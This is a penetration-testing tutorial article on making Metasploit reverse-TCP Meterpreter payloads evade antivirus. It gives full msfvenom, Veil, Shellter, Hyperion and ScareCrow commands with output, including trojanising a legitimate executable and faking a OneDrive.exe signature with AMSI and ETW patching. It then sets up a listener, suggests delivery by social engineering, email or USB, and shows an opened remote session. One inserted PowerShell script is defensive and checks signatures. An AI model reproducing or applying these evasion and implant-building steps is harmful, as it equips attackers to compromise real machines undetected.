Author: Arnel C. Reyes
Published: 13 August 2024
Last Updated: 13 August 2024
Metasploit is a powerful framework widely used for penetration testing, exploit development, and vulnerability research. One of its significant capabilities is the creation of payloads designed to execute on target systems. However, modern antivirus (AV) solutions have become adept at detecting and neutralizing these payloads. Metasploit's payload antivirus evasion techniques and tools aim to bypass these security measures, ensuring the payloads can be executed without detection. This involves encoding, obfuscation, embedding payloads in non-malicious files, dynamic shellcode injection, encryption, and more.
Background
As cybersecurity measures evolve, so do the techniques attackers and penetration testers use to bypass them. Antivirus evasion has become an essential skill for ethical hackers, as AV software increasingly incorporates advanced detection mechanisms like heuristic analysis, machine learning, and signature-based detection. Metasploit, along with other tools, provides a variety of methods to evade AV detection, enabling penetration testers to assess the security posture of systems more effectively. Understanding these techniques helps in developing more robust defenses by simulating real-world attack scenarios.
Metasploit Payload Antivirus Evasion Techniques
Antivirus evasion techniques are crucial in penetration testing and ethical hacking, where the goal is to simulate real-world attacks and test the robustness of security systems. By evading antivirus detection, penetration testers can deploy payloads that more accurately represent the threats posed by actual attackers, thus providing a more thorough security assessment.
- Encoding with 'msfvenom -e' Option: Encoding is one of the simplest forms of antivirus evasion in Metasploit. The 'msfvenom -e' option allows users to encode their payloads using a variety of encoders available in Metasploit. This technique modifies the payload's appearance without altering its functionality, helping it evade signature-based detection by AV software.
- Setup and Installation
No special installation is required for using the 'msfvenom -e' option, as it is part of the Metasploit Framework. Ensure that Metasploit is installed on the system (e.g., using Kali Linux).
- Usage
To encode a payload, use the following command:
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<METASPLOIT_IP> LPORT=<METASPLOIT_PORT> -e x86/shikata_ga_nai -f exe -o encoded_payload.exe
- Example
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.18 LPORT=4444 -e x86/shikata_ga_nai -f exe -o encoded_payload.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of exe file: 73802 bytes
Saved as: encoded_payload.exe
In this example, the 'x86/shikata_ga_nai' encoder is used to encode the payload. The encoded payload is then saved as 'encoded_payload.exe'.
- Obfuscation with Veil: Veil is a tool designed to generate Metasploit payloads that can bypass antivirus detection. It focuses on obfuscating the payload's code to evade AV signatures and heuristic detection.
- Setup and Installation
$ sudo apt update
$ sudo apt install veil
- Usage
Veil offers different modules such as Veil-Evasion for payload generation and Veil-Catapult for payload delivery. To start Veil, type 'veil' and you will be presented with a menu.
$ veil
===============================================================================
Veil | [Version]: 3.1.14
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Main Menu
2 tools loaded
Available Tools:
1) Evasion
2) Ordnance
Available Commands:
exit Completely exit Veil
info Information on a specific tool
list List available tools
options Show Veil configuration
update Update Veil
use Use a specific tool
Veil>:
- Example
» Create payload using evasion by typing 'use 1'
Veil>: use 1
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Veil-Evasion Menu
41 payloads loaded
Available Commands:
back Go to Veil's main menu
checkvt Check VirusTotal.com against generated hashes
clean Remove generated artifacts
exit Completely exit Veil
info Information on a specific payload
list List available payloads
use Use a specific payload
Veil/Evasion>:
» List available payloads by typing 'list'
Veil/Evasion>: list
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
[*] Available Payloads:
1) autoit/shellcode_inject/flat.py
2) auxiliary/coldwar_wrapper.py
3) auxiliary/macro_converter.py
4) auxiliary/pyinstaller_wrapper.py
5) c/meterpreter/rev_http.py
6) c/meterpreter/rev_http_service.py
7) c/meterpreter/rev_tcp.py
8) c/meterpreter/rev_tcp_service.py
9) cs/meterpreter/rev_http.py
10) cs/meterpreter/rev_https.py
11) cs/meterpreter/rev_tcp.py
12) cs/shellcode_inject/base64.py
13) cs/shellcode_inject/virtual.py
14) go/meterpreter/rev_http.py
15) go/meterpreter/rev_https.py
16) go/meterpreter/rev_tcp.py
17) go/shellcode_inject/virtual.py
18) lua/shellcode_inject/flat.py
19) perl/shellcode_inject/flat.py
20) powershell/meterpreter/rev_http.py
21) powershell/meterpreter/rev_https.py
22) powershell/meterpreter/rev_tcp.py
23) powershell/shellcode_inject/psexec_virtual.py
24) powershell/shellcode_inject/virtual.py
25) python/meterpreter/bind_tcp.py
26) python/meterpreter/rev_http.py
27) python/meterpreter/rev_https.py
28) python/meterpreter/rev_tcp.py
29) python/shellcode_inject/aes_encrypt.py
30) python/shellcode_inject/arc_encrypt.py
31) python/shellcode_inject/base64_substitution.py
32) python/shellcode_inject/des_encrypt.py
33) python/shellcode_inject/flat.py
34) python/shellcode_inject/letter_substitution.py
35) python/shellcode_inject/pidinject.py
36) python/shellcode_inject/stallion.py
37) ruby/meterpreter/rev_http.py
38) ruby/meterpreter/rev_https.py
39) ruby/meterpreter/rev_tcp.py
40) ruby/shellcode_inject/base64.py
41) ruby/shellcode_inject/flat.py
Veil/Evasion>:
» To create meterpreter reverse TCP payload, type 'use 7'.
Veil/Evasion>: use 7
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Payload Information:
Name: Pure C Reverse TCP Stager
Language: c
Rating: Excellent
Description: pure windows/meterpreter/reverse_tcp stager, no
shellcode
Payload: c/meterpreter/rev_tcp selected
Required Options:
Name Value Description
---- ----- -----------
COMPILE_TO_EXE Y Compile to an executable
LHOST IP of the Metasploit handler
LPORT 4444 Port of the Metasploit handler
Available Commands:
back Go back to Veil-Evasion
exit Completely exit Veil
generate Generate the payload
options Show the shellcode's options
set Set shellcode option
[c/meterpreter/rev_tcp>>]:
» Set local host using 'set LHOST <METASPLOIT_IP>' command and local port using 'set LPORT <METASPLOIT_PORT>' command.
[c/meterpreter/rev_tcp>>]: set LHOST 192.168.1.18
[c/meterpreter/rev_tcp>>]: set LPORT 4444
» To generate the meterpreter payload, type 'generate' command.
[c/meterpreter/rev_tcp>>]: generate
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
[>] Please enter the base name for output files (default is payload): obfuscated_payload
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
[*] Language: c
[*] Payload Module: c/meterpreter/rev_tcp
[*] Executable written to: /var/lib/veil/output/compiled/obfuscated_payload.exe
[*] Source code written to: /var/lib/veil/output/source/obfuscated_payload.c
[*] Metasploit Resource file written to: /var/lib/veil/output/handlers/obfuscated_payload.rc
Hit enter to continue...
- Embedding in Non-Malicious Files with 'msfvenom -x' Option: Embedding a payload in a non-malicious file is an effective way to evade antivirus detection. The 'msfvenom -x' option allows users to embed a Metasploit payload into a legitimate executable, making it less likely to be flagged as malicious.
- Setup and Installation
Like encoding, this technique is built into Metasploit, so no additional installation is required.
- Usage
To embed a payload into a non-malicious executable, use the following command:
$ msfvenom -x legitimate.exe -p windows/meterpreter/reverse_tcp LHOST=<METASPLOIT_IP> LPORT=<METASPLOIT_PORT> -f exe -o infected_legitimate.exe
- Example
$ msfvenom -x legitimate.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.1.18 LPORT=4444 -f exe -o infected_legitimate.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 1018880 bytes
Saved as: infected_legitimate.exe
In this example, 'legitimate.exe' is the legitimate executable file, and 'infected_legitimate.exe' is the resulting file containing the embedded payload.
- Dynamic Shellcode Injection with Shellter: Shellter is a dynamic shellcode injection tool that integrates Metasploit payloads into legitimate Windows applications, allowing for more advanced antivirus evasion. Unlike static methods, Shellter works by injecting shellcode into a running process, making detection much more difficult.
- Setup and Installation
$ sudo apt-get update
$ sudo apt-get install shellter
» On Windows Machine
› Download Shellter from the official website: https://www.shellterproject.com/download/.
› Extract the downloaded file and run the executable (e.g., 'shellter.exe').
- Usage
» Start Shellter by using 'shellter' command.
$ shellter
[Shellter ASCII-art banner] v7.2
www.ShellterProject.com
Choose Operation Mode - Auto/Manual (A/M/H):
» Choose 'Auto' and enter the path of the executable file that will be injected (e.g., a legitimate executable application).
Choose Operation Mode - Auto/Manual (A/M/H): a
Perform Online Version Check? (Y/N/H): y
Getting latest version information from the official website...
You have the latest version!
PE Target: /home/kali/legitimate.exe
Note: Select manual mode and specify the Metasploit payload to inject.
**********
* Backup *
**********
Backup: Shellter_Backups\legitimate.exe
********************************
* PE Compatibility Information *
********************************
Minimum Supported Windows OS: 4.0
Note: It refers to the minimum required Windows version for the target
application to run. This information is taken directly from the
PE header and might be not always accurate.
******************
* Packed PE Info *
******************
Status: Possibly Not Packed - The EntryPoint is located in the first section!
***********************
* PE Info Elimination *
***********************
Data: Dll Characteristics (Dynamic ImageBase etc...), Digital Signature.
Status: All related information has been eliminated!
****************
* Tracing Mode *
****************
Status: Tracing has started! Press CTRL+C to interrupt tracing at any time.
Note: In Auto Mode, Shellter will trace a random number of instructions
for a maximum time of approximately 30 seconds in native Windows
hosts and for 60 seconds when used in Wine.
DisASM.dll was created successfully!
The following PEB flags have been reset:
1. PEB.BeingDebugged
2. PEB.NtGlobalFlag
New Thread Created!
ID: 0x8ca4
StartAddress: 0x15010290
Thread Environment Block: 0x3c4000
Instructions Traced: 51399
Tracing Time Approx: 0.531 mins.
Starting First Stage Filtering...
*************************
* First Stage Filtering *
*************************
Filtering Time Approx: 0.00427 mins.
» Enable stealth mode for more invisibility.
Enable Stealth Mode? (Y/N/H): y
» Select payload to use from the list or custom payload.
************
* Payloads *
************
[1] Meterpreter_Reverse_TCP [stager]
[2] Meterpreter_Reverse_HTTP [stager]
[3] Meterpreter_Reverse_HTTPS [stager]
[4] Meterpreter_Bind_TCP [stager]
[5] Shell_Reverse_TCP [stager]
[6] Shell_Bind_TCP [stager]
[7] WinExec
Use a listed payload or custom? (L/C/H): l
Select payload by index: 1
» Set local host IP and Port of the Metasploit listener.
***************************
* meterpreter_reverse_tcp *
***************************
SET LHOST: 192.168.1.18
SET LPORT: 4444
» Shellter will dynamically inject the shellcode into the selected process, creating a new executable that can bypass AV detection.
****************
* Payload Info *
****************
Payload: meterpreter_reverse_tcp
Size: 281 bytes
Reflective Loader: NO
Encoded-Payload Handling: Enabled
Handler Type: IAT
******************
* Encoding Stage *
******************
Encoding Payload: Done!
****************************
* Assembling Decoder Stage *
****************************
Assembling Decoder: Done!
***********************************
* Binding Decoder & Payload Stage *
***********************************
Status: Obfuscating the Decoder using Thread Context Aware Polymorphic
code, and binding it with the payload.
Please wait...
Binding: Done!
*********************
* IAT Handler Stage *
*********************
Fetching IAT Pointers to Memory Manipulation APIs...
0. VirtualAlloc --> IAT[4541d8]
1. VirtualAllocEx --> N/A
2. VirtualProtect --> N/A
3. VirtualProtectEx --> N/A
4. HeapCreate/HeapAlloc --> IAT[4541bc]/IAT[454150]
5. LoadLibrary/GetProcAddress --> IAT[454204]/IAT[454110]
6. GetModuleHandle/GetProcAddress --> IAT[454128]/IAT[454110]
7. CreateFileMapping/MapViewOfFile --> IAT[454230]/IAT[454228]
Using Method --> 5
***************************
* IAT Handler Obfuscation *
***************************
Status: Binding the IAT Handler with Thread Context Aware Polymorphic code.
Please wait...
Code Generation Time Approx: 0.128 seconds.
*************************
* PolyMorphic Junk Code *
*************************
Type: Engine
Generating: ~308 bytes of PolyMorphic Junk Code
Please wait...
Generated: 311 bytes
Code Generation Time Approx: 0.128 seconds.
Starting Second Stage Filtering...
**************************
* Second Stage Filtering *
**************************
Filtering Time Approx: 0.00213 mins.
*******************
* Injection Stage *
*******************
Virtual Address: 0x41eb8e
File Offset: 0x1df8e
Section: .text
Adjusting stub pointers to IAT...
Done!
Adjusting Call Instructions Relative Pointers...
Done!
Injection Completed!
*******************
* PE Checksum Fix *
*******************
Status: Valid PE Checksum has been set!
Original Checksum: 0x0
Computed Checksum: 0x1014dd
**********************
* Verification Stage *
**********************
Info: Shellter will verify that the first instruction of the
injected code will be reached successfully.
If polymorphic code has been added, then the first
instruction refers to that and not to the effective
payload.
Max waiting time: 10 seconds.
Warning!
If the PE target spawns a child process of itself before
reaching the injection point, then the injected code will
be executed in that process. In that case Shellter won't
have any control over it during this test.
You know what you are doing, right? ;o)
Injection: Verified!
Press [Enter] to continue...
- Obfuscation and Encryption with Hyperion: Hyperion is a tool used to encrypt Metasploit payloads, making them harder for antivirus software to detect. Hyperion operates by encrypting the payload and then using a simple decryption stub to decrypt and execute the payload in memory.
- Setup and Installation
» Hyperion is included in Kali Linux by default, but it can also be compiled from source. To locate the Hyperion directory, use the following commands:
$ find / -name '*hyperion*'
$ dpkg -L hyperion
If not installed, use the following command to install Hyperion:
$ sudo apt update && sudo apt upgrade -y
$ sudo apt install hyperion
» To compile Hyperion on Kali:
$ sudo apt install git mingw-w64 gcc-multilib
$ git clone https://github.com/nullsecuritynet/tools
$ cd tools/windows-binaries/hyperion
$ make
» Install Wine
$ sudo apt-get update
$ sudo apt-get dist-upgrade
$ sudo dpkg --add-architecture i386
$ sudo mkdir -pm755 /etc/apt/keyrings
$ sudo wget -O /etc/apt/keyrings/winehq-archive.key https://dl.winehq.org/wine-builds/winehq.key
$ sudo wget -NP /etc/apt/sources.list.d/ https://dl.winehq.org/wine-builds/debian/dists/bookworm/winehq-bookworm.sources
$ sudo apt-get install wine32
- Usage
To encrypt a payload with Hyperion, use the following command:
$ wine /path/to/hyperion.exe <input_payload.exe> <output_encrypted_payload.exe>
- Example:
$ sudo wine /usr/share/windows-resources/hyperion/hyperion.exe rev_tcp_payload.exe encrypted_rev_tcp_payload.exe
In this example, Hyperion creates an encrypted version of the payload that can be used to evade antivirus detection.
- Troubleshooting for 'err:virtual:allocate_virtual_memory out of memory for allocation'
$ sudo swapoff /swapfile
$ sudo rm /swapfile
$ sudo dd if=/dev/zero of=/swapfile bs=1M count=4096
$ sudo chmod 600 /swapfile
$ sudo mkswap /swapfile
$ sudo swapon /swapfile
$ sudo swapon --show
$ free -h
This creates a 4 GB swap file, increasing the memory available for Wine to allocate.
- Encrypt and Sign with ScareCrow: ScareCrow is a tool designed to generate and sign Windows payloads that can evade antivirus and endpoint detection. It uses techniques like encryption and digital signing to make the payload appear as a legitimate application.
- Setup and Installation
» Install Go if it’s not already installed, as ScareCrow is written in Go.
$ sudo apt-get update
$ sudo apt-get install golang-go
$ sudo apt install gccgo-go
$ sudo apt install golang-go
$ go install mvdan.cc/garble@latest
$ go get github.com/fatih/color
$ go get github.com/yeka/zip
$ go get github.com/josephspurrier/goversioninfo
$ go get github.com/Binject/debug/pe
$ go get github.com/awgh/rawreader
» Install OpenSSL, OSSSignCode, and MingW-w64.
› OpenSSL is already installed on most Linux systems, but it can be updated or installed if needed.
› OSSSignCode is a tool for signing and verifying PE executables (exe, dll).
› MingW-w64 is a compiler suite for Windows, which is necessary for compiling Windows executables on Linux.
$ sudo apt-get install openssl
$ sudo apt-get install osslsigncode
$ sudo apt-get install mingw-w64
» Clone the ScareCrow repository from GitHub and build the executable:
$ git clone https://github.com/optiv/ScareCrow.git
$ cd ScareCrow
$ go build ScareCrow.go
- Usage
To create an encrypted and signed payload with ScareCrow, use the following command:
$ ./ScareCrow -I <payload> -O <output_file>
- Example
» First, create a payload using 'msfvenom'.
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.18 LPORT=4444 -f raw -o rev_tcp_payload.bin
» Generate an encrypted and signed payload using the following command:
$ ./ScareCrow -I rev_tcp_payload.bin -domain microsoft.com -encryptionmode AES
[ScareCrow ASCII-art banner]
(@Tyl0us)
“Fear, you must understand is more than a mere obstacle.
Fear is a TEACHER. the first one you ever had.”
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[+] Patched AMSI Enabled
[+] Sleep Timer set for 2323 milliseconds
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With OneDrive's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing OneDrive.exe With a Fake Cert
[+] Signed File Created
[+] Binary Compiled
[!] Sha256 hash of OneDrive.exe: 075e2a951540f9f8a366fdcc01f291db7f4eae176929fb8356ecd29e8858d4ed
In this example, ScareCrow will generate a payload that is encrypted and signed, making it less likely to be detected by antivirus software.
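The defender-side counterpart to the signing step above, added here as an example that is not part of the original article or of ScareCrow: on a Windows host, Get-AuthenticodeSignature reports whether a binary's signature actually chains to a trusted root, so a self-signed certificate that merely copies a vendor's name does not pass, even when the file's version information has been copied from a real product. The folder scanned and the function name are assumptions.

```powershell
# Added example (not from the original article or from ScareCrow): list the
# executables under a folder whose Authenticode signature is missing or does
# not chain to a trusted root, alongside the company name claimed in the
# file's version information. The default folder is an assumption.
function Test-SignedBinaries {
    param(
        [string]$Path = "$env:USERPROFILE\Downloads"
    )

    # Collect .exe and .dll files recursively; skip folders we cannot read.
    $files = Get-ChildItem -Path $Path -Recurse -Include *.exe, *.dll -File -ErrorAction SilentlyContinue

    foreach ($f in $files) {
        $sig  = Get-AuthenticodeSignature -FilePath $f.FullName
        $cert = $sig.SignerCertificate

        # 'Valid' means the file hash matches the signature AND the certificate
        # chain ends in a root the machine trusts. A self-signed certificate
        # that only copies a vendor's subject name yields a non-Valid status
        # (typically UnknownError or NotTrusted); an unsigned file is NotSigned.
        $trusted = ($sig.Status -eq 'Valid')

        # Version information is attacker-controlled metadata: a file can claim
        # to be a vendor's product while its signer is nobody the host trusts.
        $company = $f.VersionInfo.CompanyName

        [pscustomobject]@{
            File    = $f.FullName
            Status  = $sig.Status
            Trusted = $trusted
            Subject = if ($cert) { $cert.Subject } else { '<unsigned>' }
            Issuer  = if ($cert) { $cert.Issuer }  else { '<unsigned>' }
            Company = $company
            SHA256  = (Get-FileHash -Path $f.FullName -Algorithm SHA256).Hash
        }
    }
}

# Show only the files that fail the chain check, untrusted signers first.
Test-SignedBinaries |
    Where-Object { -not $_.Trusted } |
    Sort-Object Status |
    Format-Table -AutoSize File, Status, Subject, Company
```

The SHA256 column is included so that a flagged file can be compared against the vendor's published hashes or submitted to a sandbox without re-hashing.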
These tools and techniques provide various methods for evading antivirus detection when using Metasploit payloads, each with its unique approach to bypassing security measures. Each of these methods aims to bypass different types of detection mechanisms employed by antivirus software, allowing the payload to execute on the target system without being blocked or flagged.
Testing the Payload
To catch the incoming connection from the payload, a listener needs to be set up.
- Open Metasploit using the following command:
$ msfconsole
- Use the Multi/Handler Module by setting up a handler for the payload:
msf6 > use exploit/multi/handler
[*] Using configured payload windows/meterpreter_reverse_tcp
- Configure the Payload by setting the payload to match the generated client payload:
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
- Set the 'LHOST' and 'LPORT' to match the values used when generating the payload:
set LHOST <metasploit_listener_ip>
set LPORT <metasploit_listener_port>
Example:
msf6 exploit(multi/handler) > set LHOST 192.168.1.18
LHOST => 192.168.1.18
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
- Start the Listener using 'exploit -j' command:
msf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[-] Handler failed to bind to 192.168.1.18:4444
[*] Started reverse TCP handler on 0.0.0.0:4444
› The -j option runs the handler as a background job.
› The -z option prevents the handler from interacting with any sessions that it creates, allowing it to keep running in the background without interruption.
- Verify that the listener is running in the background using 'jobs' command:
msf6 exploit(multi/handler) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
1 Exploit: multi/handler windows/meterpreter/reverse_tcp tcp://192.168.1.18:4444
» To stop a listener, use the 'jobs -k <job_id>' command:
jobs -k <job_id>
- Deploy the Payload
- Deliver the Payload: Transfer the generated payload to the target system using a preferred method (e.g., social engineering, email, USB).
- Execute the Payload: Once the payload is executed on the target machine, it should connect back to the Metasploit listener.
- Monitor and Interact
- Monitor the Connection: Check the Metasploit console for incoming sessions.
[*] Sending stage (176198 bytes) to 192.168.1.8
[*] Meterpreter session 1 opened (192.168.1.18:4444 -> 192.168.1.8:49254) at 2024-08-13 20:00:44 -0400
- Interact with the Session: If a connection is established, you can interact with the session using the following commands:
View active sessions using the following command:
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows SECSCI\SECSCI @ SECSCI 192.168.56.103:4444 -> 192.168.1.8:49254 (192.168.1.8)
Interact with a session using the 'sessions -i <session_id>' command:
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 2
============
Name : VirtualBox Host-Only Ethernet Adapter
Hardware MAC : 0a:00:27:00:00:0a
MTU : 1500
IPv4 Address : 192.168.1.18
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a3be:3151:b7c:5d6b
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 3
============
Name : Microsoft Wi-Fi Direct Virtual Adapter
Hardware MAC : d6:6a:6a:a1:4c:21
MTU : 1500
IPv4 Address : 169.254.212.76
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::bef6:9141:d43e:fbaf
IPv6 Netmask : ffff:ffff:ffff:ffff::
Conclusion
Metasploit payload antivirus evasion is a critical aspect of penetration testing, allowing testers to bypass sophisticated security measures and execute payloads on target systems. By mastering techniques like encoding, obfuscation, and encryption, testers can enhance the effectiveness of their security assessments. However, it's essential to use these tools responsibly and within the boundaries of legal and ethical hacking practices, as they can also be employed for malicious purposes.
Disclaimer: This documentation is intended for educational purposes only. The content provided herein is meant to inform and educate individuals about security practices, techniques, and tools. Security-Science does not support, endorse, or encourage any illegal or unethical activities, including but not limited to unauthorized access to computer systems, networks, or data. Users are advised to apply the knowledge gained responsibly and ensure compliance with all applicable laws and regulations. Security-Science shall not be held liable for any misuse of the information provided.